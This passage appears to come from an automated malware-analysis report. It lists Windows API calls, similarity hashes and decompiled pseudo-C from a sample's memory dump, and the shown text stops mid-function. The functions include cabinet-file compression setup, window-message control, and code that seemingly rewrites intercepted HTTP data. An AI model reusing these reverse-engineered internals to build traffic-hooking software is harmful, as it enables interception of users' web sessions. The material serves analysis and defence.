    • UnmapViewOfFile.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426536
    • CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426543
    • SelectObject.GDI32(?,?), ref: 00426562
    • DeleteObject.GDI32(?), ref: 00426573
    • DeleteDC.GDI32(?), ref: 00426580
    • CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426591
    • WaitForSingleObject.KERNEL32(?,00000000,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265A0
    • PostThreadMessageW.USER32 ref: 004265BA
    • CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265D1
    • CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265DA
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$Object$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
    • String ID:
    • API String ID: 2298219652-0
    • Opcode ID: 1e0a588af1f79f3f1d754791a5225ff9b86dddd822111cc8cdc33f7246667bfd
    • Instruction ID: 0d711cf439e674a6c9a2a15c0ee43bd82abc1e92628b4f789f370715d01113b5
    • Opcode Fuzzy Hash: 1e0a588af1f79f3f1d754791a5225ff9b86dddd822111cc8cdc33f7246667bfd
    • Instruction Fuzzy Hash: 7D310A70700711ABDA309B79BD48F97B3ECAF48740F450829B959E7694DA78E980CA28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415F00() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t8;
    				void* _t11;
    
    				if( *0x42e6e4 != 0) {
    					L9:
    					 *0x42e6e4 =  *0x42e6e4 + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x42e6e0 = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x42dd0c = GetProcAddress(_t2, "FCICreate");
    						 *0x42e6d0 = GetProcAddress( *0x42e6e0, "FCIAddFile");
    						 *0x42d4f4 = GetProcAddress( *0x42e6e0, "FCIFlushCabinet");
    						_t8 = GetProcAddress( *0x42e6e0, "FCIDestroy");
    						 *0x42e6d8 = _t8;
    						if( *0x42dd0c == 0 ||  *0x42e6d0 == 0 ||  *0x42d4f4 == 0 || _t8 == 0) {
    							L7:
    							FreeLibrary( *0x42e6e0);
    							goto L8;
    						} else {
    							_t11 = HeapCreate(0, 0x80000, 0);
    							 *0x42d48c = _t11;
    							if(_t11 != 0) {
    								goto L9;
    							} else {
    								goto L7;
    							}
    						}
    					}
    				}
    			}







    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00415FD8,00000000,004162CF,?,74B5FBB0,00000000,?,?,00000001), ref: 00415F12
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00415F32
    • GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00415F44
    • GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00415F57
    • GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00415F6A
    • HeapCreate.KERNEL32(00000000,00080000,00000000,00000001), ref: 00415F9A
    • FreeLibrary.KERNEL32(?,00000001), ref: 00415FAF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: d635518e55d38f2e5ad6069112ad394e6a3100a4da3ab5a04705acaa88210e9d
    • Instruction ID: e2e7db5cc811f41f7dbc1020ae0048234ba2f30944974b276dadf27b8bbf6baf
    • Opcode Fuzzy Hash: d635518e55d38f2e5ad6069112ad394e6a3100a4da3ab5a04705acaa88210e9d
    • Instruction Fuzzy Hash: 2B110A70B41700EBD7609F6AAD08B963BA8A798741FD4043BB404E32F0D7B89542CF5D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041C0F0(struct HWND__* __eax, void* __edi, void* __eflags) {
    				void* __esi;
    				intOrPtr _t46;
    				void* _t66;
    				char _t67;
    				signed char _t76;
    				void* _t97;
    				struct HWND__* _t98;
    				RECT* _t100;
    				void* _t101;
    
    				_t97 = __edi;
    				_t100 =  *(_t101 + 0x94);
    				_t98 = __eax;
    				_t76 = E004260D0(__eax) & 0x0000ffff;
    				if((_t76 & 0x00000001) != 0) {
    					L18:
    					return 1;
    				} else {
    					if(GetWindowThreadProcessId(_t98, _t101 + 0x14) == 0) {
    						 *((char*)(_t101 + 0x13)) = 0;
    						goto L9;
    					} else {
    						E00416E10(__edi + 0x3c, __edi + 0x50,  *(_t101 + 0x14), _t101 + 0x2c, 2);
    						_t66 = OpenMutexW(0x100000, 0, _t101 + 0x28);
    						if(_t66 == 0) {
    							_t67 = 0;
    						} else {
    							CloseHandle(_t66);
    							_t67 = 1;
    						}
    						 *((char*)(_t101 + 0x13)) = _t67;
    						if(_t67 == 0 || (_t76 & 0x00000010) != 0) {
    							L9:
    							_push(_t97);
    							if(E0041BEB0() == 0) {
    								L16:
    								_t46 =  *((intOrPtr*)(_t101 + 0x9c));
    								if(( *(_t46 + 0x24) & 0x40000000) == 0) {
    									IntersectRect(_t101 + 0x20, _t46 + 4, _t100);
    									FillRect( *(_t97 + 0x154), _t101 + 0x1c, 6);
    									DrawEdge( *(_t97 + 0x154), _t101 + 0x20, 0xa, 0xf);
    								}
    								goto L18;
    							} else {
    								E00410820( *((intOrPtr*)(_t97 + 0x10)) + 0x114, _t100, 0x10);
    								ResetEvent( *(_t97 + 0xc));
    								if(PostThreadMessageW( *(_t97 + 0x188),  *(_t97 + 8), 0xfffffffc, _t98) == 0) {
    									goto L16;
    								} else {
    									if(WaitForSingleObject( *(_t97 + 0xc), 0x3e8) != 0) {
    										TerminateProcess( *(_t97 + 0x17c), 0);
    										E00412DF0(_t97 + 0x17c);
    										goto L16;
    									} else {
    										if( *((char*)( *((intOrPtr*)(_t97 + 0x10)) + 0x124)) != 1) {
    											goto L16;
    										} else {
    											return  *((intOrPtr*)(_t101 + 0x13));
    										}
    									}
    								}
    							}
    						} else {
    							ResetEvent( *(_t97 + 0xc));
    							if(PostMessageW(_t98,  *(_t97 + 8), (_t100->top & 0x0000ffff) << 0x00000010 | _t100->left & 0x0000ffff, (_t100->bottom & 0x0000ffff) << 0x00000010 | _t100->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t97 + 0xc), 0x64) != 0) {
    								goto L9;
    							} else {
    								goto L18;
    							}
    						}
    					}
    				}
    			}













    APIs
      • Part of subcall function 004260D0: GetClassNameW.USER32 ref: 004260E5
    • GetWindowThreadProcessId.USER32(?,?), ref: 0041C11B
    • OpenMutexW.KERNEL32(00100000,00000000,?,?,?,00000002,?,?,?,?,77426AF0), ref: 0041C14F
    • CloseHandle.KERNEL32(00000000,?,?,?,?,77426AF0), ref: 0041C15A
    • ResetEvent.KERNEL32(?,?,?,?,?,77426AF0), ref: 0041C177
    • PostMessageW.USER32(?,?,?,?), ref: 0041C19E
    • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,77426AF0), ref: 0041C1AE
    • ResetEvent.KERNEL32(?,?,?,00000010,?,?,?,?,?,77426AF0), ref: 0041C1DF
    • PostThreadMessageW.USER32 ref: 0041C1F3
    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,?,?,?,77426AF0), ref: 0041C206
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,77426AF0), ref: 0041C242
    • IntersectRect.USER32 ref: 0041C267
    • FillRect.USER32 ref: 0041C27B
    • DrawEdge.USER32(?,0000000A,0000000A,0000000F), ref: 0041C291
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: EventMessageObjectPostProcessRectResetSingleThreadWait$ClassCloseDrawEdgeFillFromHandleIntersectMutexNameOpenStringTerminateWindow
    • String ID:
    • API String ID: 689169473-0
    • Opcode ID: 7273f22ca432eab4713fdf8a0108b0570573b646dcc6f5a05b4300d7e148cd11
    • Instruction ID: fa2801edb8c9e1c149402c2c032ec4754aff4b841967bafeaeee0fb329cd0e78
    • Opcode Fuzzy Hash: 7273f22ca432eab4713fdf8a0108b0570573b646dcc6f5a05b4300d7e148cd11
    • Instruction Fuzzy Hash: 2341DD31640301BBE310DFA4DD84FF7B7A8FB48700F008619F95496291DB78E995CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E004275A0(signed short __eax, void* __edx) {
    				void* __esi;
    				long _t53;
    				signed short _t61;
    				struct HWND__* _t66;
    				struct HWND__* _t67;
    				intOrPtr _t71;
    				signed short _t81;
    				int _t82;
    				void* _t83;
    				int _t84;
    				int _t85;
    				void* _t86;
    
    				_t81 = __eax;
    				_t66 = _t67;
    				_t83 = __edx;
    				if(__eax == 0x201 || __eax == 0x207 || __eax == 0x204) {
    					_t84 = GetAncestor(_t66, 2);
    					if(_t84 ==  *(_t83 + 0x170)) {
    						goto L8;
    					} else {
    						if(SendMessageTimeoutW(_t66, 0x21, _t84, (_t81 & 0x0000ffff) << 0x00000010 |  *(_t86 + 0x1c) & 0x0000ffff, 2, 0x64, _t86 + 0x10) == 0) {
    							L7:
    							 *(_t83 + 0x170) = _t84;
    							goto L8;
    						} else {
    							_t53 =  *(_t86 + 0x10);
    							if(_t53 == 2 || _t53 == 4) {
    								goto L30;
    							} else {
    								goto L7;
    							}
    						}
    					}
    				} else {
    					L8:
    					_t85 =  *(_t86 + 0x1c) & 0x0000ffff;
    					PostMessageW(_t66, 0x20, _t66, (_t81 & 0x0000ffff) << 0x00000010 | _t85);
    					if( *(_t86 + 0x1c) != 1) {
    						_t82 = E004274B0(_t83, _t66,  *((intOrPtr*)(_t86 + 0x20)));
    						_t26 = _t85 - 2; // -2
    						_t53 = _t26;
    						if(_t53 > 0x13) {
    							L47:
    							return PostMessageW(_t66, _t82, _t85,  *(_t86 + 0x28));
    						} else {
    							_t27 = _t53 + 0x42789c; // 0x1000042
    							switch( *((intOrPtr*)(( *_t27 & 0x000000ff) * 4 +  &M00427874))) {
    								case 0:
    									if(__edi == 0xa3) {
    										goto L47;
    									} else {
    										if(__edi == 0xa5) {
    											goto L35;
    										} else {
    											goto L54;
    										}
    									}
    									goto L56;
    								case 1:
    									if(_t82 == 0xa3) {
    										goto L37;
    									}
    									if(_t82 == 0xa5) {
    										goto L35;
    									} else {
    										if(_t82 != 0xa1) {
    											goto L30;
    										} else {
    											return PostMessageW(_t66, 0x7b, _t66,  *(_t86 + 0x28));
    										}
    									}
    									goto L56;
    								case 2:
    									if(__edi != 0xa1) {
    										if(__edi != 0xa0) {
    											goto L30;
    										} else {
    											__edx =  *(__esi + 8);
    											return PostMessageW(__ebx,  *(__esi + 8), 0xfffffffe, 0);
    										}
    									} else {
    										return PostMessageW(__ebx,  *(__esi + 8), 0xffffffff, 0);
    									}
    									goto L56;
    								case 3:
    									if(__edi == 0xa1) {
    										GetWindowThreadProcessId(__ebx, 0) = E004272D0(__ebx, __esi, __eax, 0, 1);
    										goto L47;
    									} else {
    										if(__edi == 0xa2 || __edi == 0xa3 || __edi == 0xa0) {
    											goto L47;
    										} else {
    											goto L44;
    										}
    									}
    									goto L56;
    								case 4:
    									if(__edi != 0xa2) {
    										goto L44;
    									} else {
    										__edx =  *(__esp + 0x18);
    										if(( *( *(__esp + 0x18) + 0x24) & 0x00020000) != 0) {
    											__eax = 0xf020;
    											goto L29;
    										}
    										goto L30;
    									}
    									goto L56;
    								case 5:
    									if(__edi != 0xa2) {
    										goto L44;
    									} else {
    										__eax =  *(__esp + 0x18);
    										__eax =  *( *(__esp + 0x18) + 0x24);
    										if((__eax & 0x00010000) == 0) {
    											goto L30;
    										} else {
    											__eax = __eax & 0x01000000;
    											__eax =  ~__eax;
    											asm("sbb eax, eax");
    											__eax = __ax & 0x0000ffff;
    											if(__ax == 0) {
    												goto L30;
    											} else {
    												__edx = 0xffff;
    												if(__ax != __dx) {
    													goto L29;
    												}
    												goto L35;
    											}
    										}
    									}
    									goto L56;
    								case 6:
    									L54:
    									if(__edi != 0xa1) {
    										goto L30;
    									} else {
    										 *((intOrPtr*)(__esp + 0x1c)) = GetWindowThreadProcessId(__ebx, 0);
    										return __eax;
    									}
    									goto L56;
    								case 7:
    									if(__edi == 0xa2) {
    										L37:
    										goto L29;
    									}
    									goto L44;
    								case 8:
    									if(__edi == 0xa2) {
    										__eax = 0xf180;
    										L29:
    										return PostMessageW(_t66, 0x112, 0xf060,  *(_t86 + 0x28));
    									}
    									L44:
    									if(__edi != 0xa5) {
    										L30:
    										return _t53;
    									} else {
    										L35:
    										return PostMessageW(_t66, 0x7b, _t66,  *(_t86 + 0x28));
    									}
    									goto L56;
    								case 9:
    									goto L47;
    							}
    						}
    					} else {
    						_t71 =  *((intOrPtr*)(_t83 + 0x10));
    						_t61 = 0;
    						if(( *(_t71 + 1) & 0x00000080) != 0) {
    							_t61 = 1;
    						}
    						if(( *(_t71 + 2) & 0x00000080) != 0) {
    							_t61 = _t61 | 0x00000002;
    						}
    						if(( *(_t71 + 4) & 0x00000080) != 0) {
    							_t61 = _t61 | 0x00000010;
    						}
    						if(( *(_t71 + 0x10) & 0x00000080) != 0) {
    							_t61 = _t61 | 0x00000004;
    						}
    						if(( *(_t71 + 0x11) & 0x00000080) != 0) {
    							_t61 = _t61 | 0x00000008;
    						}
    						return PostMessageW(_t66, E004274B0(_t83, _t66, _t81), _t61 & 0x0000ffff,  *(_t86 + 0x24));
    					}
    				}
    				L56:
    			}















    APIs
    • GetAncestor.USER32(00000000,00000002,00000000,?,?,?,00000000,00427C53,?,00000001,000000A0,?,?), ref: 004275C6
    • SendMessageTimeoutW.USER32 ref: 004275F1
    • PostMessageW.USER32(00000000,00000020,00000000,00000000), ref: 00427629
    • PostMessageW.USER32(00000000,00000000,00000000,00000200), ref: 0042767A
    • PostMessageW.USER32(?,0000007B,?,?), ref: 004276D8
    • PostMessageW.USER32(?,00000112,?,?), ref: 00427713
    • PostMessageW.USER32(00000000,0000007B,00000000,?), ref: 00427769
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004277D0
    • PostMessageW.USER32(00000000,00000000,00000000,?), ref: 004277E4
    • PostMessageW.USER32(?,00000001,000000FF,00000000), ref: 00427803
    • PostMessageW.USER32(?,00000001,000000FE,00000000), ref: 00427826
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042785E
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$Post$ProcessThreadWindow$AncestorSendTimeout
    • String ID:
    • API String ID: 3834953286-0
    • Opcode ID: abf779a467d26b525d9c6532bf36921afdf200465abdec2c904ff8246aff3145
    • Instruction ID: 8710c53efe13d224ec08304d0220b31d61ed04be28d7cc6a3b8f8faba3e79ed2
    • Opcode Fuzzy Hash: abf779a467d26b525d9c6532bf36921afdf200465abdec2c904ff8246aff3145
    • Instruction Fuzzy Hash: 676102727083245AE624862DFC88FBB6759D7C1365F944A2BF542872E2C67EE8418339
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E004085A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v20;
    				void* _v28;
    				signed char _v32;
    				char _v40;
    				intOrPtr _v44;
    				char _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				void* _v68;
    				void* _v76;
    				void* _v80;
    				void* _v84;
    				void* __edi;
    				void* __esi;
    				long _t95;
    				signed int _t98;
    				intOrPtr _t132;
    				void* _t142;
    				void* _t153;
    				signed int _t156;
    				signed int _t158;
    				intOrPtr _t161;
    				intOrPtr _t177;
    				intOrPtr _t191;
    				intOrPtr _t193;
    				intOrPtr* _t195;
    				intOrPtr _t197;
    				intOrPtr _t199;
    				intOrPtr _t202;
    				void* _t205;
    				void* _t206;
    				signed int _t209;
    				void* _t210;
    				intOrPtr _t211;
    				void* _t212;
    				void* _t213;
    				void* _t214;
    				signed int _t216;
    				void* _t218;
    				void* _t220;
    				intOrPtr _t233;
    
    				_t218 = (_t216 & 0xfffffff8) - 0x2c;
    				_t95 = WaitForSingleObject( *0x42edbc, 0);
    				_t202 = _a4;
    				_t193 = _a12;
    				if(_t95 == 0 || _a8 == 0 || _t193 <= 0) {
    					L39:
    					return  *0x42d3e8(_t202, _a8, _t193);
    				} else {
    					EnterCriticalSection(0x42d3c4);
    					_t98 = E00407350(_t202);
    					if(_t98 == 0xffffffff) {
    						L38:
    						LeaveCriticalSection(0x42d3c4);
    						goto L39;
    					} else {
    						_t177 =  *0x42d3e0; // 0x0
    						_t158 = _t98 * 8 - _t98;
    						_t153 = _t177 + _t158 * 8;
    						if( *((intOrPtr*)(_t177 + 0x30 + _t158 * 8)) > 0) {
    							L31:
    							_t205 =  *(_t153 + 0x30) -  *((intOrPtr*)(_t153 + 0x34));
    							__eflags = _t193 - _t205;
    							_t206 =  <  ? _t193 : _t205;
    							_t86 = _t153 + 0x2c; // 0x2c
    							_t195 = _t86;
    							E00410820(_a8,  *((intOrPtr*)(_t153 + 0x2c)) +  *((intOrPtr*)(_t153 + 0x34)), _t206);
    							 *((intOrPtr*)(_t153 + 0x34)) =  *((intOrPtr*)(_t153 + 0x34)) + _t206;
    							__eflags =  *((intOrPtr*)(_t153 + 0x34)) -  *(_t153 + 0x30);
    							if( *((intOrPtr*)(_t153 + 0x34)) ==  *(_t153 + 0x30)) {
    								E00410870(E004107C0( *_t195), _t195, 0, 0xc);
    							}
    							LeaveCriticalSection(0x42d3c4);
    							return _t206;
    						} else {
    							if( *((intOrPtr*)(_t153 + 0x10)) <= 0) {
    								goto L38;
    							} else {
    								LeaveCriticalSection(0x42d3c4);
    								_t197 =  *0x42d3e8(_t202, _a8, _t193);
    								_t220 = _t218 + 0xc;
    								_v44 = _t197;
    								if(_t197 <= 0xffffffff) {
    									L37:
    									return _t197;
    								} else {
    									EnterCriticalSection(0x42d3c4);
    									_t156 = E00407350(_t202);
    									if(_t156 == 0xffffffff) {
    										L34:
    										_push(8);
    										_push(0xffffe890);
    										goto L35;
    									} else {
    										if(_t197 == 0) {
    											L10:
    											_t161 =  *0x42d3e0; // 0x0
    											_t153 = _t161 + (_t156 * 8 - _t156) * 8;
    											if(_t197 > 0) {
    												E00410820( *((intOrPtr*)(_t153 + 0x14)) +  *(_t153 + 0x18), _a8, _t197);
    												_t24 = _t153 + 0x18;
    												 *_t24 =  *(_t153 + 0x18) + _t197;
    												_t233 =  *_t24;
    											}
    											_t209 = E00408050(_t233,  &_v20,  *((intOrPtr*)(_t153 + 0x14)),  *(_t153 + 0x18));
    											if(_t209 == 1) {
    												_t209 = E004082D0( *(_t153 + 0x18),  &_v20,  *((intOrPtr*)(_t153 + 0x14)), (_t113 & 0xffffff00 | _t197 == 0x00000000) & 0x000000ff,  &_v40,  &_v48);
    												if(_t209 == 1) {
    													if(E00425560( *((intOrPtr*)(_t153 + 4)),  &_v40,  &_v48,  *((intOrPtr*)(_t153 + 0xc)),  *((intOrPtr*)(_t153 + 0x10))) != 0) {
    														_t209 =  *(_t220 + 0x30);
    														_t199 = E004107A0( *(_t153 + 0x18) -  *((intOrPtr*)(_t220 + 0x34)) + _t209 + _v48 + 0x14);
    														 *((intOrPtr*)(_t220 + 0x18)) = _t199;
    														if(_t199 != 0) {
    															E00410820(_t199,  *((intOrPtr*)(_t153 + 0x14)), _t209);
    															_t132 = _v60;
    															if((_v32 & 0x00000002) == 0) {
    																E00411200(_t132,  &_v32);
    																_t210 = _t199 + E00417BB0(_t199, _t209, "Content-Length",  &_v32);
    																_t211 = _t210 + E00410820(_t210, _v56, _v64);
    																__eflags = _t211;
    															} else {
    																_push(_t132);
    																_t212 = _t209 + _t199;
    																_t142 = E00411D70(_t132, 0xd, _t212, "%x\r\n");
    																_t220 = _t220 + 8;
    																_t213 = _t212 + _t142;
    																_t214 = _t213 + E00410820(_t213, _v40, _v48);
    																E00410820(_t214, "\r\n0\r\n\r\n", 7);
    																_t199 = _v60;
    																_t211 = _t214 + 7;
    															}
    															_t137 =  *(_t153 + 0x18);
    															_t171 =  *((intOrPtr*)(_t220 + 0x34));
    															if( *((intOrPtr*)(_t220 + 0x34)) !=  *(_t153 + 0x18)) {
    																_t211 = _t211 + E00410820(_t211,  *((intOrPtr*)(_t153 + 0x14)) + _t171, _t137 - _t171);
    															}
    															E004107C0( *((intOrPtr*)(_t153 + 0x14)));
    															_t209 = _t211 - _t199;
    															 *((intOrPtr*)(_t153 + 0x14)) = _t199;
    															 *(_t153 + 0x18) = _t209;
    														}
    														_t197 = _v44;
    													}
    													_t209 = _t209 | 0xffffffff;
    													E004107C0(_v40);
    												}
    											}
    											if(_t197 <= 0) {
    												L28:
    												if(__eflags == 0) {
    													L30:
    													 *((intOrPtr*)(_t153 + 0x34)) = 0;
    													 *((intOrPtr*)(_t153 + 0x14)) = 0;
    													 *(_t153 + 0x18) = 0;
    													 *((intOrPtr*)(_t153 + 0x2c)) =  *((intOrPtr*)(_t153 + 0x14));
    													 *(_t153 + 0x30) =  *(_t153 + 0x18);
    													E00425CF0( *((intOrPtr*)(_t153 + 0x10)),  *((intOrPtr*)(_t153 + 0xc)));
    													_t193 = _a12;
    													__eflags = 0;
    													 *((intOrPtr*)(_t153 + 0x10)) = 0;
    													 *((intOrPtr*)(_t153 + 0xc)) = 0;
    													goto L31;
    												} else {
    													__eflags = _t209 - 0xffffffff;
    													if(_t209 != 0xffffffff) {
    														goto L36;
    													} else {
    														goto L30;
    													}
    												}
    											} else {
    												if(_t209 != 0) {
    													__eflags = _t197;
    													goto L28;
    												} else {
    													_push(0);
    													_push(0xffffe892);
    													L35:
    													 *0x42d3c0();
    													_v44 = 0xffffffff;
    													_t197 = _v44;
    													L36:
    													LeaveCriticalSection(0x42d3c4);
    													goto L37;
    												}
    											}
    										} else {
    											_t191 =  *0x42d3e0; // 0x0
    											_t17 = _t191 + (_t156 * 8 - _t156) * 8 + 0x14; // 0x14
    											if(E00410740( *((intOrPtr*)(_t191 + (_t156 * 8 - _t156) * 8 + 0x18)) + _t197, _t17) == 0) {
    												goto L34;
    											} else {
    												goto L10;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}














































    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 004085B4
    • EnterCriticalSection.KERNEL32(0042D3C4), ref: 004085DF
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 0040861F
    • EnterCriticalSection.KERNEL32(0042D3C4), ref: 00408648
    • LeaveCriticalSection.KERNEL32(0042D3C4,00000000,?,?), ref: 00408898
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 004088C8
      • Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752
      • Part of subcall function 00417BB0: StrCmpNIA.SHLWAPI(?,?,00000000,00000000,00000000,?,?,?,?,?), ref: 00417C52
      • Part of subcall function 00417BB0: HeapAlloc.KERNEL32(?,00000000,?,?,?,?,?), ref: 00417C7C
      • Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 004088DC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Heap$EnterFree$AllocObjectSingleWait
    • String ID: 0$%x$Content-Length
    • API String ID: 4226758563-3838797520
    • Opcode ID: bc8b9fe48aee8be7ae272fbd96448250cb6d68f05f5c38309599c8d6f13eb58b
    • Instruction ID: 7187d8172827c6b86885b265f03b8039d5178bea7c058573e981ff8388779b29
    • Opcode Fuzzy Hash: bc8b9fe48aee8be7ae272fbd96448250cb6d68f05f5c38309599c8d6f13eb58b
    • Instruction Fuzzy Hash: 51A1C472A002009FCB14EF28D985E6B77A5EF84314F10466EFC54AB296DB34EC55CBE9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0042789F(void* __eax, intOrPtr* __ebx, signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
    				void* _v60;
    				void* _v64;
    				signed int _v80;
    				signed int _v84;
    				signed int _v88;
    				signed char _v92;
    				long _v96;
    				signed short _v100;
    				void* _v104;
    				intOrPtr _v108;
    				signed int _v117;
    				void* __esi;
    				void* _t147;
    				intOrPtr _t148;
    				struct HWND__* _t150;
    				signed int _t152;
    				signed int _t154;
    				signed int _t156;
    				signed short _t161;
    				signed short _t165;
    				signed short _t168;
    				signed short _t171;
    				signed int _t177;
    				struct HWND__* _t178;
    				signed short _t179;
    				signed short _t181;
    				signed short _t183;
    				intOrPtr _t187;
    				signed char _t195;
    				signed int _t199;
    				long _t205;
    				signed short _t228;
    				signed int _t232;
    				signed short _t252;
    				struct HWND__* _t258;
    				struct HWND__* _t259;
    				void* _t261;
    				intOrPtr _t263;
    				signed int _t267;
    				void* _t269;
    
    				_t147 = __eax +  *__ebx +  *((intOrPtr*)(__eax +  *__ebx + 0x6060606));
    				_push(es);
    				_push(es);
    				_push(es);
    				 *__ecx =  *__ecx | __ecx;
    				es = es;
    				_v117 = _v117 | __edx;
    				_t269 = (_t267 & 0xfffffff8) - 0x54;
    				_push(__ebx);
    				_t261 = _t147;
    				_t148 =  *((intOrPtr*)(_t261 + 0x10));
    				_t232 = 0;
    				_v96 = 0;
    				if( *((intOrPtr*)(_t148 + 0x110)) == 0) {
    					_t205 =  *((intOrPtr*)(_t148 + 0x108));
    					_v96 = _t205;
    					if(_t205 != 0) {
    						_t228 = 0;
    						if(( *(_t148 + 1) & 0x00000080) != 0) {
    							_t228 = 1;
    						}
    						if(( *(_t148 + 2) & 0x00000080) != 0) {
    							_t228 = _t228 | 0x00000002;
    						}
    						if(( *(_t148 + 4) & 0x00000080) != 0) {
    							_t228 = _t228 | 0x00000010;
    						}
    						if(( *(_t148 + 0x10) & 0x00000080) != 0) {
    							_t228 = _t228 | 0x00000004;
    						}
    						if(( *(_t148 + 0x11) & 0x00000080) != 0) {
    							_t228 = _t228 | 0x00000008;
    						}
    						_t232 = _t228 & 0x0000ffff;
    					}
    					_t195 = _a4;
    					_v92 = _t232;
    				} else {
    					_t195 = _a4;
    					if((_t195 & 0x00000001) != 0) {
    						E00427350(_a12, _a8, _t261);
    						_t195 = _t195 & 0xfffffffe;
    						_a4 = _t195;
    					}
    					if((_t195 & 0x00000004) != 0) {
    						WaitForSingleObject( *(_t261 + 0x14), 0xffffffff);
    						_t187 =  *((intOrPtr*)(_t261 + 0x10));
    						_t259 =  *(_t187 + 0x108);
    						 *((intOrPtr*)(_t187 + 0x10c)) = 0;
    						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x10)) + 0x108)) = 0;
    						 *((short*)( *((intOrPtr*)(_t261 + 0x10)) + 0x110)) = 0;
    						ReleaseMutex( *(_t261 + 0x14));
    						if(IsWindow(_t259) != 0) {
    							PostMessageW(_t259, 0x215, 0, 0);
    						}
    					}
    				}
    				 *( *((intOrPtr*)(_t261 + 0x10)) + 0x100) = _a8;
    				_t150 = _a12;
    				 *( *((intOrPtr*)(_t261 + 0x10)) + 0x104) = _t150;
    				if(_t195 == 0) {
    					L90:
    					return _t150;
    				} else {
    					_t152 = _t195 & 0x00000002;
    					_v88 = _t152;
    					if(_t152 == 0) {
    						if((_t195 & 0x00000004) == 0) {
    							L26:
    							_t154 = _t195 & 0x00000020;
    							_v84 = _t154;
    							if(_t154 == 0) {
    								if((_t195 & 0x00000040) == 0) {
    									L31:
    									_t156 = _t195 & 0x00000008;
    									_v80 = _t156;
    									if(_t156 == 0) {
    										if((_t195 & 0x00000010) == 0) {
    											L36:
